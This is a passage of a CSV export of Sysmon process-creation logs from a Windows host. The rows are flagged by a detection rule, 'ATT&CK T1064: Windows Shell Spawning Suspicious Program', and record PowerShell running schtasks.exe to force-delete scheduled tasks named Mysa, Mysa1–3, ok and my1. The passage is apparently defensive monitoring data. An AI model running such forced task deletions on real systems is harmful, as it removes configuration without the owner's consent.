Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.162",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.776 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ba8a2100} +ProcessId: 6012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.783321400Z"",""eventRecordID"":""2789"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.776\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ba8a2100}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.776"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010ba8a2100}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.098",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.649 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010bb872100} +ProcessId: 380 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.691612800Z"",""eventRecordID"":""2788"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.649\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010bb872100}\r\nProcessId: 380\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.649"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010bb872100}"",""processId"":""380"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.087",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.489 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e9852100} +ProcessId: 5384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.498329000Z"",""eventRecordID"":""2787"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.489\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e9852100}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.489"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010e9852100}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.058",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.446 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00100c842100} +ProcessId: 8060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.452389600Z"",""eventRecordID"":""2786"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.446\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00100c842100}\r\nProcessId: 8060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.446"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00100c842100}"",""processId"":""8060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.042",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.414 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00103a822100} +ProcessId: 2328 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.418786100Z"",""eventRecordID"":""2785"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.414\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00103a822100}\r\nProcessId: 2328\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.414"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00103a822100}"",""processId"":""2328"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.037",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.373 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001063802100} +ProcessId: 7896 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.375823600Z"",""eventRecordID"":""2784"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.373\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001063802100}\r\nProcessId: 7896\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.373"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001063802100}"",""processId"":""7896"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 